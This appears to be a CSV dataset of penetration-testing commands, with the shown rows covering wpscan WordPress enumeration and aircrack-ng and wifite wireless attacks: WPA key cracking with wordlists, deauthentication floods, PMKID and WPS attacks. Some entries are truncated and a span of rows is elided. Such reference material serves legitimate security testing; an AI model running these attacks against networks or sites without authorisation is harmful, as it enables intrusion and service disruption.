711,wpscan,wpscan --url http://example.com --enumerate ap,Enumerate all WordPress plugins.,WordPress plugin scanning,"[--url, --enumerate]",https://wpscan.com/wordpress-security-scanner
712,wpscan,wpscan --url http://example.com --disable-tls-...,Scan WordPress site without TLS certificate va...,WordPress vulnerability scanning,"[--url, --disable-tls-checks]",https://wpscan.com/wordpress-security-scanner
713,wpscan,wpscan --url http://example.com --random-agent,Scan WordPress site with a random user agent.,WordPress vulnerability scanning,"[--url, --random-agent]",https://wpscan.com/wordpress-security-scanner
714,wpscan,wpscan --url http://example.com --enumerate at,Enumerate all WordPress themes.,WordPress theme scanning,"[--url, --enumerate]",https://wpscan.com/wordpress-security-scanner

--- Category: Wireless ---

,tool,command,description,use_case,flags,reference_link
715,aircrack-ng,aircrack-ng -w wordlist.txt capture.cap,Crack WEP/WPA keys from captured packets.,Wireless network key cracking,[-w],https://www.aircrack-ng.org/
716,aircrack-ng,airmon-ng start wlan0,Enable monitor mode on a wireless interface.,Wireless packet capturing,[start],https://www.aircrack-ng.org/
717,aircrack-ng,airodump-ng wlan0mon --bssid 00:11:22:33:44:55,Capture packets from a specific wireless acces...,Wireless traffic analysis,[--bssid],https://www.aircrack-ng.org/
718,aircrack-ng,aircrack-ng -a 2 -w wordlist.txt capture.cap,Crack WPA2 keys from captured packets.,WPA2 key cracking,"[-a, -w]",https://www.aircrack-ng.org/
719,aircrack-ng,aireplay-ng --deauth 10 -a 00:11:22:33:44:55 w...,Send deauthentication packets to a wireless AP.,Wireless deauthentication attack,"[--deauth, -a]",https://www.aircrack-ng.org/

--- Category: Wireless Attacks ---

,tool,command,description,use_case,flags,reference_link
720,aircrack-ng,aircrack-ng capture.cap,Crack WEP/WPA keys from a captured file.,Password cracking,[],https://www.aircrack-ng.org/documentation.html
721,aircrack-ng,aircrack-ng -w wordlist.txt capture.cap,Crack WPA key using a wordlist.,Password cracking,[-w],https://www.aircrack-ng.org/documentation.html
722,aircrack-ng,aircrack-ng -b 00:11:22:33:44:55 capture.cap,Crack key for a specific AP.,Password cracking,[-b],https://www.aircrack-ng.org/documentation.html
723,aircrack-ng,aircrack-ng -J capture capture.cap,Generate an hccap file for WPA cracking.,Password cracking,[-J],https://www.aircrack-ng.org/documentation.html
724,aircrack-ng,aircrack-ng -e FreeWiFi capture.cap,Crack key for an AP with specific ESSID.,Password cracking,[-e],https://www.aircrack-ng.org/documentation.html
...,...,...,...,...,...,...
785,wifite,wifite --cracked,Show previously cracked networks.,Attack history,[--cracked],https://github.com/derv82/wifite2
786,wifite,wifite --dict wordlist.txt -i wlan0,Use custom wordlist for cracking.,Password cracking,"[--dict, -i]",https://github.com/derv82/wifite2
787,wifite,wifite --pmkid -i wlan0,Capture PMKID for WPA attack.,PMKID attack,"[--pmkid, -i]",https://github.com/derv82/wifite2
788,wifite,wifite --kill -i wlan0,Kill conflicting processes before attack.,Automated Wi-Fi attack,"[--kill, -i]",https://github.com/derv82/wifite2
789,wifite,wifite --wps -i wlan0,Target WPS-enabled networks.,WPS attack,"[--wps, -i]",https://github.com/derv82/wifite2